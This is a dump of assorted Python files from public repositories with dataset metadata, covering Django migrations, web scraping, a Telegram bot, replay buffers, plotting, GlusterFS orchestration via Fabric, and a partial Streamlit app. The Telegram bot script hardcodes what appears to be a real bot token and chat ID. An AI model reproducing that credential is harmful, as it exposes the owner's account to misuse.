models.TextField(serialize=False, primary_key=True)),\n ('resolutions', django_pgjson.fields.JsonField()),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('tags', models.ManyToManyField(blank=True, to='monitors.IndicatorTag')),\n ],\n ),\n migrations.AlterField(\n model_name='indicatoralert',\n name='indicator',\n field=models.TextField(),\n ),\n migrations.AlterField(\n model_name='indicatoralert',\n name='message',\n field=models.TextField(),\n ),\n migrations.AlterUniqueTogether(\n name='certificatemonitor',\n unique_together=set([('owner', 'certificate_value')]),\n ),\n ]\n", "repo_name": "armyninja/cyber", "sub_path": "monitors/migrations/0002_certificate_monitors_and_ulimited_alert_text.py", "file_name": "0002_certificate_monitors_and_ulimited_alert_text.py", "file_ext": "py", "file_size_in_byte": 1712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.contrib.postgres.fields.ArrayField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.contrib", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django_pgjson.fields.fields.JsonField", "line_number": 27, "usage_type": "call"}, {"api_name": "django_pgjson.fields.fields", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django_pgjson.fields", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterUniqueTogether", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "12054521859", "text": "import requests\nfrom bs4 import BeautifulSoup\n\n\nurl = \"http://python123.io/ws/demo.html\"\nr = requests.get(url)\ndemo = r.text\nsoup = BeautifulSoup(demo, \"html.parser\")\ntag = soup.a # 返回第一个\nprint(\"type(tag):\"+str(type(tag)))\nprint(\"type(tag.attr):\"+str(type(tag.attrs)))\n\n\n\n", "repo_name": "konsydong/python_requests", "sub_path": "Requests/week2/soupelement.py", "file_name": "soupelement.py", "file_ext": "py", "file_size_in_byte": 283, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "72292078044", "text": "import http.server\nimport socketserver\nimport time\nfrom PostgresDatabase import PostgresDatabase\n\ndef build_html():\n \"\"\"! Connect to the database, get all items, close connection, build the html.\n \"\"\"\n # conn = psql.connect()\n p = '<tr><td>Id</td><td>Author</td><td>Quote</td></tr>'\n db = PostgresDatabase()\n db.connect()\n if db.connection:\n db.execute('SELECT * FROM quotes')\n result = db.cursor.fetchall()\n db.close()\n\n for row in result:\n # for displaying an image\n # item = f'<tr><td>{row[0]}</td><td>{row[1]}</td><td><img src=\"{row[2]}\" alt=\"\" height=100 width=100 /></td>'\n item = f'<tr><td>{row[0]} </td><td>{row[1]} </td><td>{row[2]}</td>'\n p = p + item\n\n contents = f'''<!DOCTYPE html>\n <html>\n <body>\n <table>\n {p}\n </table>\n </body>\n </html>\n '''\n filename = 'index.html'\n return contents, filename\n\ndef main():\n \"\"\"! Main function that opens the webpage. The while loop keeps the server running and repeatedly calls main().\n \"\"\"\n contents, filename = build_html()\n output = open(filename,\"w\")\n output.write(contents)\n output.close()\n\nclass MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/':\n self.path = 'index.html'\n return http.server.SimpleHTTPRequestHandler.do_GET(self)\n\nwhile(True):\n # time.sleep(10)\n main()\n # Create an object of the above class\n handler_object = MyHttpRequestHandler\n\n PORT = 8080\n my_server = socketserver.TCPServer((\"\", PORT), handler_object)\n # find site at localhost:8080 or 127.168.0.0:8080 in browser\n\n # Star the server\n my_server.serve_forever()", "repo_name": "borchr27/lux_project", "sub_path": "docker/frontend/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PostgresDatabase.PostgresDatabase", "line_number": 11, "usage_type": "call"}, {"api_name": "http.server.server", "line_number": 44, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 44, "usage_type": "name"}, {"api_name": "http.server.server.SimpleHTTPRequestHandler.do_GET", "line_number": 48, "usage_type": "call"}, {"api_name": "http.server.server", "line_number": 48, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 48, "usage_type": "name"}, {"api_name": "socketserver.TCPServer", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "34625356805", "text": "from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nimport telepot\nfrom telepot.loop import MessageLoop\nimport execute2\nfrom multiprocessing import Process, Queue\n\nchat_id = \"473099318\"\nTelegram_Token = '1435246331:AAEuTzd96pMR8ACXl92za8CSFo_0gd1QCvY'\n\ndef hello(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Everything is fine :)\")\n \ndef start(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Ich mach noch nix\")\n execute2.run = True\n p = Process(target=fire_and_forget, args=())\n # you have to set daemon true to not have to wait for the process to join\n p.daemon = True\n p.start()\n print(\"doing stuff in the background\")\n \n\ndef stop(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Ich mach noch nix\")\n execute2.run = False\n\ndef fire_and_forget(): \n execute2.measure()\n\nx=1\nx=x+1\nprint(x)\n\nbot = telepot.Bot(Telegram_Token)\nupdater = Updater(Telegram_Token)\n\ndp = updater.dispatcher #Dieser ficker sorgt dafür, dass neue Befehle gefunden werden\ndp.add_handler(CommandHandler(\"start\", start))\ndp.add_handler(CommandHandler(\"stop\", stop))\n\nupdater.dispatcher.add_handler(CommandHandler('hello', hello))\n\nupdater.start_polling()\nupdater.idle()", "repo_name": "spmk/ADP3DDruck", "sub_path": "test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 11, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 14, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 14, "usage_type": "name"}, {"api_name": "execute2.run", "line_number": 16, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 17, "usage_type": "call"}, {"api_name": "telegram.Update", "line_number": 24, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 24, "usage_type": "name"}, {"api_name": "execute2.run", "line_number": 26, "usage_type": "attribute"}, {"api_name": "execute2.measure", "line_number": 29, "usage_type": "call"}, {"api_name": "telepot.Bot", "line_number": 35, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 36, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "4482295500", "text": "from collections import deque, namedtuple\nimport numpy as np\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nExperience = namedtuple('Experience', field_names=['state', 'action', 'reward',\n 'done', 'new_state'])\n\n\nclass Episode:\n def __init__(self, observations, actions, rewards, dones):\n self.observations = observations\n self.actions = actions\n self.rewards = rewards\n self.dones = dones\n\n def __len__(self):\n return len(self.observations)\n\n\nclass EpisodeReplayBuffer:\n def __init__(self, buffer_capacity, use_n_newest=0):\n self.buffer = deque(maxlen=buffer_capacity)\n self.use_n_newest = use_n_newest\n\n def __len__(self):\n return len(self.buffer)\n\n def append(self, episode):\n self.buffer.append(episode)\n\n def sample(self, sample_size):\n sample_indices = np.random.choice(self.__len__(),\n size=sample_size,\n replace=False)\n if self.use_n_newest > 0:\n replace_indices = []\n for i in range(1, self.use_n_newest + 1):\n index = self.__len__() - i - 1\n if index not in sample_indices:\n sample_indices[-i] = index\n\n episodes = [self.buffer[i] for i in sample_indices]\n episode_lengths = [len(e) for e in episodes]\n seq_len = np.max(episode_lengths)\n fill_mask = torch.zeros((sample_size, seq_len - 1))\n for i in range(sample_size):\n fill_mask[i, :len(episodes[i]) - 1] = 1\n\n obs = [torch.tensor(e.observations, dtype=torch.float32) \\\n for e in episodes]\n a = [torch.tensor(e.actions, dtype=torch.int64) \\\n for e in episodes]\n r = [torch.tensor(e.rewards, dtype=torch.float32) \\\n for e in episodes]\n done = [torch.tensor(e.dones, dtype=torch.int64) \\\n for e in episodes]\n\n obs = pad_sequence(obs, batch_first=True)\n a = pad_sequence(a, batch_first=True)\n r = pad_sequence(r, batch_first=True)\n done = pad_sequence(done, batch_first=True)\n\n return obs, a, r, done, fill_mask\n\n\nclass ReplayBuffer:\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def __len__(self):\n return len(self.buffer)\n\n def append(self, experience):\n self.buffer.append(experience)\n\n def sample(self, batch_size):\n indices = np.random.choice(len(self.buffer), batch_size, replace=False)\n states, actions, rewards, dones, next_states = zip(*[self.buffer[idx] for idx in indices])\n\n return (np.array(states), np.array(actions), np.array(rewards, dtype=np.float32),\n np.array(dones, dtype=np.bool), np.array(next_states))\n", "repo_name": "ajlangley/deep-coordination-graphs", "sub_path": "src/replay_buffer.py", "file_name": "replay_buffer.py", "file_ext": "py", "file_size_in_byte": 2846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.namedtuple", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 57, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 63, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "38775954120", "text": "# Import the required Libraries\nfrom tkinter import *\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\n# Create an instance of Tkinter frame\nwin = Tk()\n\n# Set the geometry of tkinter frame\nwin.geometry(\"750x250\")\n\n\ndef Sub_Plot(axis, subplot_x, sublplot_y, x_data, y_data, plot_title, plot_x_label, plot_y_label):\n axis[subplot_x, sublplot_y].plot(x_data, y_data)\n axis[subplot_x, sublplot_y].set_title(plot_title)\n axis[subplot_x, sublplot_y].set_xlabel(plot_x_label)\n axis[subplot_x, sublplot_y].set_ylabel(plot_y_label)\n\n\ndef graph():\n df = pd.read_csv('data.csv')\n df_column_names = list(df.columns)[1:]\n columns_num = len(df_column_names)\n instruments_num = int((len(df_column_names) - 1) / 2)\n print(df_column_names)\n print(\"Number of columns:\", columns_num)\n print(\"Number of instruments:\", instruments_num)\n fig, axs = plt.subplots(instruments_num, 3)\n column_pointer = 1\n for i in range(0, instruments_num):\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=0,\n x_data=df[df_column_names[column_pointer]].values,\n y_data=df[df_column_names[column_pointer + 1]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[column_pointer][7:],\n plot_y_label=df_column_names[column_pointer + 1][7:])\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=1,\n x_data=df[df_column_names[0]].values,\n y_data=df[df_column_names[column_pointer]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[0],\n plot_y_label=df_column_names[column_pointer][7:])\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=2,\n x_data=df[df_column_names[0]].values,\n y_data=df[df_column_names[column_pointer + 1]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[0],\n plot_y_label=df_column_names[column_pointer + 1][7:])\n column_pointer += 2\n fig.tight_layout()\n plt.show()\n\n\n# Create a button to show the plot\nButton(win, text=\"Show Graph\", command=graph).pack(pady=20)\nwin.mainloop()\n", "repo_name": "CAMMS-Duke-University/Source-Meter-PyMeasure", "sub_path": "examples_plots/static_plot_3.py", "file_name": "static_plot_3.py", "file_ext": "py", "file_size_in_byte": 2400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "25611188266", "text": "import matplotlib.pyplot as plt\nfrom matplotlib import style\nimport csv\n\ndef loss_graph(file_name, graph_type):\n\tpath = \"csv/\" + file_name + \".csv\"\n\tx = []\n\ty = []\n\twith open(path, 'r') as csvfile:\n\t\tplots = csv.reader(csvfile, delimiter=',')\n\t\tnext(plots, None)\n\t\tfor row in plots:\n\t\t\tx.append(int(row[1]))\n\t\t\ty.append(round(float(row[2]), 4))\n\tplt.plot(x,y,label=graph_type)\n\tplt.xlabel('Épocas')\n\tif(graph_type=='validation_accuracy'):\n\t\tplt.title('Acurácia de validade')\n\t\tplt.ylabel('Acurácia')\n\telif(graph_type=='train_accuracy'):\n\t\tplt.title('Acurácia de treino')\n\t\tplt.ylabel('Acurácia')\n\telif(graph_type=='train_loss'):\n\t\tplt.title('Perda da etapa de treino')\n\t\tplt.ylabel('Erro')\n\telif(graph_type=='validation_loss'):\n\t\tplt.title('Perda da etapa de validação')\n\t\tplt.ylabel('Erro')\n\n\tplt.legend()\n\tplt.show()\n\nloss_graph(\"Arch5_val_acc\", \"validation_accuracy\")\nloss_graph(\"Arch5_train_acc\", \"train_accuracy\")\nloss_graph(\"Arch5_train_loss\", \"train_loss\")\nloss_graph(\"Arch5_val_loss\", \"validation_loss\")", "repo_name": "RickSaitamaSanchez/Neural_Networks", "sub_path": "Speech_Recognition_LSTM/graph_plot.py", "file_name": "graph_plot.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "csv.reader", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "40883472284", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"Orchestration template\n\nThe following tasks must be implemented:\n - start\n - stop\n - restart\n - status\n\nAn instance endpoint has to be provided using the CLUSTERDN environment variable.\nFor example:\n\n CLUSTERDN=\"instances/test/reference/1.0.0/1\"\n\nA fabric roledef is created for each service defined in the registry.\nIt can be used with the decorator: @roles('servicename1')\n\nWARN: The hosts are accesed using the IP address of the first network device,\nusually eth0.\n\nThe properties of a given service can be accessed through:\n\n SERVICES['servicename'].propertyname\n\nfor example:\n\n SERVICES['namenode'].heap\n # If the property has dots we can use\n SERVICES['datanode'].get('dfs.blocksize')\n # Or even define a default value in case it does not exist\n SERVICES['datanode'].get('dfs.blocksize', '134217728')\n\nDetails about a given node can be obtained through each Node object returned by service.nodes\n\nThe fabfile can be tested running it in NOOP mode (testing mode) exporting a NOOP env variable.\n\nRequired roles: initiator, responders, peerback\n\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nfrom fabric.api import *\nfrom fabric.colors import red, green, yellow\nfrom fabric.contrib.files import exists\n# FIXME: Installing configuration-registry with pip and importing registry directly does not work\n# inside the fabfile. Temporarily it is copied manually in the utils directory\n#from utils import registry\n# In the big data nodes configuration-registry is installed globally\nimport registry\nimport time\nfrom pprint import pprint\n\n\n# Maximum number of retries to wait for a node to change to status running\nMAX_RETRIES = 100\n# Seconds between retries\nDELAY = 5\n\n\ndef eprint(*args, **kwargs):\n \"\"\"Print to stderr\"\"\"\n print(*args, file=sys.stderr, **kwargs)\n\n\nif os.environ.get('CLUSTERDN'):\n CLUSTERDN = os.environ.get('CLUSTERDN')\nelse:\n eprint(red('An instance endpoint has to be provided using the CLUSTERDN environment variable'))\n sys.exit(2)\n\nif os.environ.get('REGISTRY'):\n REGISTRY = os.environ.get('REGISTRY')\nelse:\n REGISTRY = 'http://consul.service.int.cesga.es:8500/v1/kv'\n\n# Retrieve info from the registry\nregistry.connect(REGISTRY)\ncluster = registry.Cluster(CLUSTERDN)\nnodes = cluster.nodes\nservices = cluster.services\n\n\ndef wait_until_node_is_running(node):\n \"\"\"Wait until node is in status running: i.e. docker-executor finished\"\"\"\n name = node.name\n retry = 0\n while not node.status == 'running':\n retry += 1\n if retry > MAX_RETRIES: sys.exit(3)\n print('Waiting for node {}: {}/{}'.format(name, retry, MAX_RETRIES))\n time.sleep(DELAY)\n\n\ndef get_node_address_for_fabric(node):\n \"\"\"Return the network address to be used by fabric to connect to the node\n\n By convention the address used is the address of its first network interface\n \"\"\"\n return node.networks[0].address\n\n\n# Expose the relevant information\nNODES = {node.name: node for node in nodes}\nSERVICES = {service.name: service for service in services}\nNODE = {}\nfor node in nodes:\n wait_until_node_is_running(node)\n properties = {'hostname': node.name}\n for dev in node.networks:\n properties[dev.name] = dev.address\n for disk in node.disks:\n properties[disk.name] = disk.destination\n # The node is labeled with the network address that will be used by fabric\n # to connect to the node, this allows to retrieve the node using NODE[env.host]\n label = get_node_address_for_fabric(node)\n NODE[label] = properties\n\n# Show cluster information\npprint(NODE)\n\nenv.user = 'root'\nenv.hosts = NODE.keys()\n# Allow known hosts with changed keys\nenv.disable_known_hosts = True\n# Retry 30 times each 10 seconds -> (30-1)*10 = 290 seconds\nenv.connection_attempts = 30\nenv.timeout = 10\n# Enable ssh client keep alive messages\nenv.keepalive = 15\n\n# Define the fabric roles according to the cluster services\nfor service in services:\n env.roledefs[service.name] = [n.networks[0].address for n in service.nodes]\n\n#\n# Debugging mode\n#\n# To enable it use: export NOOP=1\nif os.environ.get('NOOP'):\n\n print(yellow('\\n\\n== Running in NOOP mode ==\\n\\n'))\n\n def run(name):\n print('[{0}] run: {1}'.format(env.host, name))\n\n def put(source, destination):\n print('[{0}] put: {1} {2}'.format(env.host, source, destination))\n\n @task\n @parallel\n def hostname():\n \"\"\"Print the hostnames: mainly used for testing purposes\"\"\"\n run('/bin/hostname')\n\n\n@task\n@runs_once\ndef start():\n \"\"\"Initialize the GlusterFS cluster and create the volumes\"\"\"\n execute(configure_service)\n execute(peer_probe)\n execute(peer_probe_against_initiator)\n execute(create_volumes)\n execute(start_volumes)\n cluster.status = 'running'\n print(green(\"All services started\"))\n\n\n@task\ndef configure_service():\n \"\"\"Configure the GlusterFS filesystems\"\"\"\n generate_etc_hosts()\n\n\ndef generate_etc_hosts():\n # Generate /etc/hosts\n for n in NODE.values():\n run('echo \"{} {}\" >> /etc/hosts'.format(n['eth1'], n['hostname']))\n\n\n@task\n@roles('initiator')\ndef peer_probe():\n \"\"\"Probe for peers step 1\"\"\"\n for peer in env.roledefs['responders']:\n run('gluster peer probe {}'.format(NODE[peer]['hostname']))\n\n\n@task\n@roles('peerback')\ndef peer_probe_against_initiator():\n \"\"\"Probe for peers step 2\"\"\"\n initiator = env.roledefs['initiator'][0]\n run('gluster peer probe {}'\n .format(NODE[initiator]['hostname']))\n\n\n@task\n@roles('initiator')\ndef create_volumes():\n \"\"\"Create GlusterFS volumes\"\"\"\n run('gluster peer status')\n # Use eth1 to reference the nodes\n #nodes = [n['eth1'] for n in NODE.values()]\n # Use the hostnames to reference the nodes\n nodes = [n['hostname'] for n in NODE.values()]\n bricks = [NODE[env.host][b] for b in NODE[env.host] if 'brick' in b]\n layout = ''\n for (node1, node2) in pairwise(nodes):\n #for brick in range(1, 12):\n for brick in bricks:\n layout += '{node1}:{brick}/drv0 {node2}:{brick}/drv0 '.format(\n node1=node1, node2=node2, brick=brick)\n run('gluster volume create distributed-replicated-volume-0 '\n 'replica 2 transport tcp {}'.format(layout))\n\n\n@task\n@roles('initiator')\ndef start_volumes():\n \"\"\"Start GlusterFS volumes\"\"\"\n run('gluster volume start distributed-replicated-volume-0')\n\n\ndef pairwise(nodes):\n \"\"\"Create pairs of nodes: 1->2, 3->4, ...\"\"\"\n group1 = nodes[::2]\n group2 = nodes[1::2]\n return zip(group1, group2)\n\n\n@task\ndef status():\n \"\"\"Check the status of the GlusterFS service\"\"\"\n print(yellow(\"== SERVICE STATUS ==\"))\n run('systemctl status rpcbind')\n run('systemctl status glusterd')\n print(yellow('== PEER STATUS =='))\n run('gluster peer status')\n print('== VOLUME INFO ==')\n run('gluster volume info')\n\n\n@task\n@runs_once\ndef stop():\n \"\"\"Stop the GlusterFS service and all the containers that provide it\"\"\"\n with settings(warn_only=True):\n execute(stop_service)\n\n\n@task\ndef stop_service():\n \"\"\"Stop the GlusterFS service without stopping the containers\"\"\"\n # TODO: Check what we really need to stop\n run('systemctl stop glusterd')\n run('systemctl stop rpcbind')\n\n\n@task\n@runs_once\ndef restart():\n \"\"\"Restart all the services of the cluster\"\"\"\n execute(stop)\n execute(start)\n\n\n@task\n@roles('initiator')\ndef test():\n \"\"\"Just run some test command\"\"\"\n run('uname -a')\n", "repo_name": "bigdatacesga/paas", "sub_path": "tests/gluster/fabfile.py", "file_name": "fabfile.py", "file_ext": "py", "file_size_in_byte": 7501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.stderr", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 67, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 68, "usage_type": "attribute"}, {"api_name": "fabric.colors.red", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 71, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 73, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 74, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 74, "usage_type": "attribute"}, {"api_name": "registry.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "registry.Cluster", "line_number": 80, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 121, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "fabric.colors.yellow", "line_number": 143, "usage_type": "call"}, {"api_name": "fabric.colors.green", "line_number": 168, "usage_type": "call"}, {"api_name": "fabric.colors.yellow", "line_number": 237, "usage_type": "call"}, {"api_name": "fabric.colors.yellow", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "70443162205", "text": "import streamlit as st\nimport datetime\nimport random\nimport requests\nimport json\n\n# streamlitは1画面しか表示できないから、サイドバーで切り替える\npage = st.sidebar.selectbox('Choose your page', ['users', 'rooms', 'bookings'])\n\n# ユーザー画面\nif page == 'users':\n st.title('ユーザー登録画面')\n\n # formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='user'): # keyはformとの紐付け\n # user_id: int = random.randint(0, 10) # user_idは登録したタイミングで決める\n username: str = st.text_input('ユーザ名', max_chars=12) # , max12文字\n # userのpostで必要なデータを送ってあげる\n data = {\n # 'user_id': user_id,\n 'username': username\n }\n submit_button = st.form_submit_button(label='ユーザー登録') # formに紐づく送信ボタン\n\n # submit_buttonが押されたとき(リクエスト送信されたとき)\n if submit_button:\n url = 'http://127.0.0.1:8000/users'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n if res.status_code == 200:\n st.success('ユーザー登録完了')\n st.write(res.status_code)\n st.json(res.json())\n\n\n# 会議室画面\nelif page == 'rooms':\n st.title('会議室登録画面')\n\n # 